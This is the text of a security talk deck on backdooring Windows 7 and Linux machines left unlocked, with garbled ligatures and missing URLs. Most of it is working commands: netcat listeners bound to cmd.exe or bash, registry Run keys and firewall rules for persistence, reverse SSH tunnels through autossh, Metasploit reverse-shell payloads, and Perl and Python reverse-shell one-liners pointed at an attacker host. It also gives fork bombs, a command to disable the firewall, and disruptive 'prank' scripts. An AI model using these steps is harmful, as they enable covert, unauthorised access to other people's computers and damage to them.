Back Dooring Operating Systems


Back Dooring Operating Systems
An Introduc+on to Back Dooring Opera+ng Systems for Fun and Trolling Lance Bu)ars Aka Nemus DC801 h)p:// Disclaimer •  The informaEon provided in this presentaEon by me is to be used for educaEonal purposes only. •  I am in no way responsible for any misuse of the informaEon provided. •  All of the informaEon is to develop a defense aHtude in order to provided insight into what is possible. •  In no way should you use the informaEon to cause any kind of damage directly or indirectly. •  You implement the informaEon given in this presentaEon at your own risk. Contact a Lawyer if you have legal quesEons. Scenario: Target leaves their desk and their computer is unlocked. Guess what? This happens right? So what else could we do? Lets see how fast we can install a back door. Prep Work •  You will need a tool kit to: –  Download more files or addiEon soQware. –  edit files. –  Setup the back door quickly. –  Do pranks and what not. –  Put your tool kit on a usb drive or host it on a website somewhere on the internet. Backdooring Windows 7 •  Lets setup a backdoor on a Windows system using net cat. •  We assume the users is logged in with admin privileges. Windows 7 Tool kit setup •  gVim –  h)p://­‐win3264/downloads/
detail?name=vim73-­‐ •  Wget (for windows 64 bit) –  h)p:// •  Net Cat –  Or from Kali find / -­‐name nc.exe •  h)p:// –  h)p://­‐for-­‐windows/ Hello World of Back Doors Net Cat •  On Windows –  nc.exe -­‐dLp 449 -­‐e cmd.exe –  L This opEon makes Netcat a persistent listener which starts listening again aQer a client disconnect •  (-­‐l only listens for one connecEon) –  p port number that net cat is listening on –  e Execute a command once a connecEon has been received in this example we start a cmd session. –  d this has something to do with making nc silent •  (not sure couldn’t find documentaEon) Basic Windows CMD Linux Commands • 
cd – change directory pwd -­‐ present working directory ls -­‐ list all files in directory cat file.txt – display file contents wget -­‐ dowload files from cli vi -­‐edit files vi cli ./scriptname -­‐ run bash script export PATH=$PATH:/opt/new –  Modify system path to find new execuEables Windows Versions • 
Cd echo %cd% Dir /p Type wget from tool kit Vi from tool kit (edit is gone L) Wscript scriptname.vbs SET PATH=%PATH%;c:
\pathtotoolkit Batch cmds to setup persistent back door on Windows 7 •  @echo offxcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -­‐y •  reg add "HKLM\soQware\microsoQ\windows\currentversion\run" /f /v "system" /t REG_SZ /d "C:\windows\system32\nc.exe -­‐Ldp 449 -­‐e cmd.exe” •  netsh advfirewall firewall add rule name="Rule 34" dir=in acEon=allow protocol=UDP localport=449 •  netsh advfirewall firewall add rule name="Allow Messenger" dir=in acEon=allow program="C:\windows\system32\nc.exe" •  # you must run these commands as administrator Example expanded from h)p://www.offensive-­‐­‐unleashed/Persistent_Netcat_Backdoor VBS Script to start NC in background. •  Dim objShellSet objShell = WScript.CreateObject ("") "C:\windows
\system32\nc.exe -­‐Ldp 449 -­‐e cmd.exe"Set objShell = Nothing •  This is so we don’t have to wait for the user to restart their computer. Verify NC backdoor using Process Explore Download PS h)p://­‐us/sysinternals/bb896653.aspx Connect Using Net cat nc –v ipaddress port Run Command or Batch with out cmd Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "C:\Batch Files
\syncfiles.bat" & Chr(34), 0 Set WshShell = Nothing Windows Pranks h)p:// •  Let the keyboard type "You are a fool." con+nuously •  Set wshShell = wscript.CreateObject("WScript.Shell") •  do •  wscript.sleep 100 •  wshshell.sendkeys "You are a fool." •  loop •  Save it as Anything.vbs Toggle the Caps Lock buIon con+nuously •  Set wshShell =wscript.CreateObject("WScript.Shell") •  do •  wscript.sleep 100 •  wshshell.sendkeys "{CAPSLOCK}" •  loop •  Save it as Anything.vbs h)p:// Spread Garbage Everywhere randomly •  spread like a real virus bomb: :e copy /Y %0 %random%.bat start %0 %0|%0 goto :e •  h)p://­‐to-­‐
make-­‐a-­‐fork-­‐bomb-­‐exe/ Start Notepad con+nuously @echo off :top START %SystemRoot%\system32\notepad.exe GOTO top •  Or start a website conEnuously –  start "" h)p:// Make a disco on their keyboard •  This script lights up your scroll lock, caps lock and num locks LED's and flashes in a cool rhythmic way which gives the percepEon of a live disco on your keyboard. •  Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop h)p:// Play windows start up tone •  Set objVoice = CreateObject("SAPI.SpVoice") Set objFile = CreateObject("SAPI.SpFileStream.
1") objFile.Open "Windows XP Startup.wav" objVoice.Speakstream objFile h)p:// Pop Cd Rom Drive Con+noually Pop Out the CD drive Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollecEon do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count -­‐ 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count -­‐ 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Save it as Anything.vbs Windows Fork Bomb •  a fork bomb is an a)ack wherein a process conEnually replicates to eat up available system resources slowing a computer to a crawl. •  Windows Bat Form Bom –  @ECHO OFF :START START fork.bat GOTO START Unclosable File @echo off md hello :A start hello goto A •  Save as uncloseable.bat Speak Out Loud to User Set args = Wscript.Arguments speakargtext = args.Item(0) strText = "your message here" Set objVoice = CreateObject("SAPI.SpVoice") objVoice.Speak strText objVoice.Speak speakargtext Muter h)p://­‐computer-­‐pranks/ •  What this prank does is set the volume of all the playback devices (speakers) to zero then kills the volume control app so they can not turn the volume back up. An excepEon to this program is if their keyboard has volume controls. Although if someone is blasEng some horrible music, podcast, etc… this can be very useful to bring some peace and quite to your work day. • 
OpEon Explicit Dim wshShell Dim objWMIService, objProcess, colProcess Dim strComputer, strProcessKill strComputer = "." 'process to kill strProcessKill = "'SndVol.exe'" 'opens process Set wshShell= CreateObject("WScript.Shell") wshShell.Run "SndVol" WScript.sleep 500 'this lowers the volume all the way down on all devices wshShell.SendKeys"{END}" WScript.sleep 500 'this loop just kills the process of the volume control unEll this program is ended Do Set objWMIService = GetObject("winmgmts:" _ & "{impersonaEonLevel=impersonate}!\\" _ & strComputer & "\root\cimv2") Set colProcess = objWMIService.ExecQuery _ ("Select * from Win32_Process Where Name = " & strProcessKill ) For Each objProcess in colProcess objProcess.Terminate() Next Loop Shutdown windows • 
%windir%\system32\shutdown.exe -­‐r -­‐t 00 shutdown -­‐r — restarts shutdown -­‐s — shutsdown shutdown -­‐l — logoff shutdown -­‐t xx — where xx is number of seconds to wait Ell shutdown/restart/logoff •  shutdown -­‐i — gives you a dialog box to fill in what funcEon you want to use •  shutdown -­‐a — aborts the previous shutdown command....very handy! Batch to Exe •  To make your scripts and batch files harder to read. –  This is not fool proof but helps hided your code. •  Batchor CMD –  hIp:// •  VBS –  hIp://­‐from-­‐vbs-­‐
v13.html –  hIp:// –  hIp:// (not sure how safe) •  Powershell –  hIp:// (beta) netsh advfirewall For windows 7 •  netsh advfirewall set allprofiles state off –  Turn off windows firewall will noEfy user •  netsh advfirewall set allprofiles state on –  Turns firewall on •  netsh advfirewall reset –  Reset the firewall back to default •  netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound –  Block everything •  netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 acEon=block dir=IN –  Open Port •  netsh advfirewall firewall delete rule name="HTTP” –  Delete Rule Windows Tasks •  Crea+ng Tasks –  SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword /SC HOURLY /TN rtest1 /TR notepad •  Delete Tasks –  SCHTASKS /Delete /TN "Backup and Restore” •  Running Tasks –  SCHTASKS /Run /TN "Start Backup" h)p://­‐us/magazine/ff356867.aspx Sdelete (secure delete) •  h)p://­‐us/sysinternals/
bb897443.aspx •  Usage: sdelete [-­‐p passes] [-­‐s] [-­‐q] <file or directory> ... sdelete [-­‐p passes] [-­‐z|-­‐c] [drive leIer] ... •  -­‐aRemove Read-­‐Only a)ribute.-­‐cClean free space.-­‐p passesSpecifies number of overwrite passes (default is 1).-­‐qDon't print errors (Quiet).-­‐s or -­‐rRecurse subdirectories.-­‐zZero free space (good for virtual disk opEmizaEon). Backdoor Linux •  Lets setup a backdoor on a Linux system using net cat. •  We assume the users is logged in as root and the terminal is leQ open and una)ended. Linux Tool Kit •  Compile missing items to make them portable then test them on target systems. •  Autossh –  h)p:// •  Net Cat –  H)p:// Compile it •  Shred (core uEls) –  h)p://
development/chapter05/coreuEls.html •  Screen –  h)p://
general/screen.html Persistent connecEon script By default netcat does not do a persistent connecEon on Linux you will need to run it in a while loop if you want to connect to it more than once. #!/bin/bash while [ 1 ]; do echo -­‐n | netcat -­‐l -­‐v -­‐p 445 -­‐e /bin/bash Done Setup Back Door •  wget h)p:// •  cp netcat /usr/bin •  iptables -­‐A INPUT -­‐m state -­‐-­‐state NEW -­‐m tcp -­‐p tcp -­‐-­‐dport 445 -­‐j ACCEPT •  IPTABLES -­‐A OUTPUT -­‐p udp -­‐-­‐dport 445 -­‐m conntrack -­‐-­‐ctstate NEW -­‐j ACCEPT •  nohup ./ & Have Net Cat Start on Boot •  Should we use /etc/rc.local ? –  Maybe some one might see it •  Centos –  place startup script in /etc/rc.d/init.d/ •  Debian –  /etc/rc3.d/ –  Or –  /etc/rcN.d where n is the runlevel. ConnecEng to the back door. View programs that have open ports. Netstat -­‐lptun Pranks h)p://­‐linux-­‐pranks h)p:// •  Iptables and perl script to flip images –  h)p://www.ex-­‐­‐down-­‐
ternet.html •  Linux Fork Bomb –  :(){ :|:& }: •  Write to users terminal –  Write username •  Make sure volume is at 100% and send random noise: –  Cat /dev/urandom > /dev/dsp Change all output to bork bork •  perl -­‐e '$b="bork"; while(<STDIN>){$l=`$_ 2>&1`; $l=~s/[A-­‐Za-­‐z]+/$b/g; print "$l$b\@$b:
\$ ";}’ •  h)p://
swedish-­‐chef Send starwars to other user’s terminal •  Who –  someuser pts/0 2014-­‐03-­‐20 22:26 (x.x.x.2) –  Root pts/1 2014-­‐03-­‐20 23:34 (x.x.x.2) •  Send startwars to other users terminal –  telnet > /dev/pts/0 •  Cowsay –  fortune | cowsay > /dev/pts/0 More Pranks •  h)p://­‐funny-­‐
terminal/ •  h)p:// •  $elinks h)p:// | espeak If you need to disconnect from a process in Linux •  nohup command & •  Or –  Ctrl-­‐Z –  Bg –  disown %1 Compile Perl Scripts •  Create a file call hello •  #!/usr/bin/perl print "hello world. "; Convert it into executable, •  chmod +x hello Try to run it, that is our normal perl script. To make it as a binary with ELF header, do this •  perlcc -­‐o hello-­‐bin hello So what is the different? Check with file command, •  file hello* Read more: h)p://­‐perl-­‐
binaries-­‐from-­‐perl-­‐scripts.html#ixzz2wOFMZBsH •  h)p://www.perl-­‐ PHP compiler •  Bcompiler –  h)p:// •  Phc –  h)p:// •  Ioncube •  h)p:// •  hhvm –  h)p:// •  More Compiler Links –  h)p://­‐you-­‐compile-­‐
php-­‐code –  h)p://­‐php-­‐file-­‐
to-­‐binary Netcat limitaEons •  Easy to detect. •  Anyone who knows about it or finds it on a open port can connect to it. •  Its not encrypted. •  Requires a lot of setup and addiEonal tools to use effecEvely. So now what? •  So now we have a back door into a system, but it requires that we be on the same local area network or have a firewall port open to the box. •  It’s an extremely bad idea to leave a netcat backdoor open to the internet. •  So lets setup a ssh reverse shell so we can by pass the firewall. Setup Persistent SSH Tunnel •  SituaEon: you need to access a "server" which you want to access from outside that network. You cannot forward ports to that machine, but you can ssh outside (to your own server). •  You need another server to which you setup a persistent ssh connecEon with a reverse tunnel. Then if you need to access the machine you ssh into the other server, and from there you ssh through the tunnel to the restricted machine. •  Requires autossh or persistent script. •  Requires public key generaEon for auto login. Reverse SSH Tunneling •  ssh -­‐f -­‐N -­‐R 10000:localhost:22 user@external_server •  -­‐N Do not execute a remote command. This is useful for just forwarding ports (protocol version 2 only). •  -­‐f Requests ssh to go to background just before command execuEon. This is useful if ssh is going to ask for passwords or passphrases, but the user wants it in the background. •  -­‐R [bind_address:]port:host:hostport Specifies that the given port on the remote (server) host is to be forwarded to the given host and port on the local side. This works by allocaEng a socket to listen to port on the remote side, and whenever a connecEon is made to this port, the connecEon is forwarded over the secure channel, and a connecEon is made to host port hostport from the local machine. Reverse shell Examples •  ssh -­‐f -­‐N -­‐R 10000:localhost:22 user@external_server –  Set port 10000 on remote server and map it to port 22 on this local machine •  ssh -­‐f -­‐N -­‐R 10001: user@external_server –  Set port 10001 on remote server to ip address port 445 •  ssh -­‐f -­‐N -­‐R 10001: -­‐R 10000:localhost:22 user@external_server –  Note you can also chain the –R command Generate Ssh Key •  ssh-­‐keygen -­‐t rsa • 
GeneraEng public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your idenEficaEon has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/ The key fingerprint is: ad:c8:3a:3a:5c:fd:48:34:ad:f2:ac:63:29:70:0e:d0 root@rsyslog The key's randomart image is: +-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+ Copy the generated key to the remote machine. ssh-­‐copy-­‐id –I /root/.ssh/"-­‐p 2222 user@remotemachine" Use autossh to make reverse shell persistent. •  autossh -­‐M 10984 -­‐N -­‐f -­‐o "PubkeyAuthenEcaEon=yes" -­‐o "PasswordAuthenEcaEon=no" -­‐i /root/.ssh/syspub –
R 8888:localhost:22 user@remoteserver -­‐p 2222 & •  -­‐i /root/.ssh/syspub –  LocaEon of ssh key •  -­‐M is for monitoring port •  -­‐o "PubkeyAuthenEcaEon=yes” –  use public key authenEcaEon •  -­‐o "PasswordAuthenEcaEon=no" –  Do not ask for password Exploits vs Shellcode vs VulnerabiliEes •  VulnerabiliEes are places where you can take advantage of a operaEng system or a person. •  Exploits are how you take advantage of vulnerabiliEes. •  Payloads are what you do once the exploit has been executed. –  In this example the vulnerability is leaving the computer una)ended the exploit is the script we are running to setup the backdoor. The shellcode would be our reverse shell or our netcat listener. Remote ssh Tunnel and Raspberry Pi •  h)p://­‐pi-­‐
tunnel Binary Payloads •  Lets generate a binary payload instead of using netcat. •  msfpayload windows/shell_reverse_tcp O –  O command show all opEons Basic opEons: Name Current SeHng Required DescripEon -­‐-­‐-­‐-­‐ -­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐ -­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐ -­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐ EXITFUNC seh yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port DescripEon: Connect back to a)acker and spawn a command shell h)p://www.offensive-­‐­‐unleashed/Binary_Payloads Using Metasploit •  You will need a server setup to listen for incoming connecEons that has Metasploit installed. Kali has it installed by default. •  Start metasploit console –  msfconsole •  Update metasploit console –  Msfupdate •  get updates for metasploit •  Metasploit training –  h)p://www.offensive-­‐­‐
unleashed/Main_Page h)ps://­‐framework Example output •  msfpayload windows/shell_reverse_tcp LHOST=metasploit_server_ip LPORT=listening_port_on_server_ip O •  Msfpayload –h –  List all available payloads •  /payload/path O –  List available op+ons for payload •  /payload/path X > payload.exe –  Save payload and save it as a Windows Portable Executable •  /payload/path R > payload.raw –  Raw Format •  /payload/path C > payload.c –  Export payload as C code. •  /payload/path J > –  Export code as java code. Create a payload •  msfpayload windows/shell_reverse_tcp LHOST= LPORT=7777 x > /tmp/
david_hasselhoff.exe •  file /tmp/david_hasselhoff.exe •  /tmp/david_hasselhoff.exe: PE32 executable (GUI) Intel 80386, for MS Windows •  Execute binary on target system and listen for response from binary. Set mfsconsole to listen for your binary. •  Start msfconsole –  Msfconsole –  use exploit/mulE/handler –  set LHOST –  set LPORT=7777 •  Run exploit –  Exploit (starts listening port on metasploit systems) add it to your tool kit. ExecuEng command CreaEng an Undetectable Custom SSH Backdoor in Python for Windows •  IntresEng Side Note •  h)p://
python-­‐z/ Reverse shells one-­‐liners •  Perl Shorter Perl reverse shellz that does not depend on /bin/sh: perl -­‐MIO -­‐e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"a)ackerip:4444");STDIN-­‐
>fdopen($c,r);$~-­‐>fdopen($c,w);system$_ while<>;’ •  Python python -­‐c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.
1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-­‐i"]);' h)p://­‐sheet/shells/reverse-­‐shell-­‐cheat-­‐sheet References h)ps:// h)p://­‐2011-­‐Summer/a-­‐
simple-­‐bash-­‐backdoor.html h)p://­‐script-­‐for-­‐
generaEng-­‐ssh-­‐keys •  h)p://­‐ssh-­‐
connecEon.html •  h)p:// •  h)p:// •  h)p://
Autossh_persistent_tunnels.html •  h)p://­‐a-­‐unbreakable-­‐ssh-­‐